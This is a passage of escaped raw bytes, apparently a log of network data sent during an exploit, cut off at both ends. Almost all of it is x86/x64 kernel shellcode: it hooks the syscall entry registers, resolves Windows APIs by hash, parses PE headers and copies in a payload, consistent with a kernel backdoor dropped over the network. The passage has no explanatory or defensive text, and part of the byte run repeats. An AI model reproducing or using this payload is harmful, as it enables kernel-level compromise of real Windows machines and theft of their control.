\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 20, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\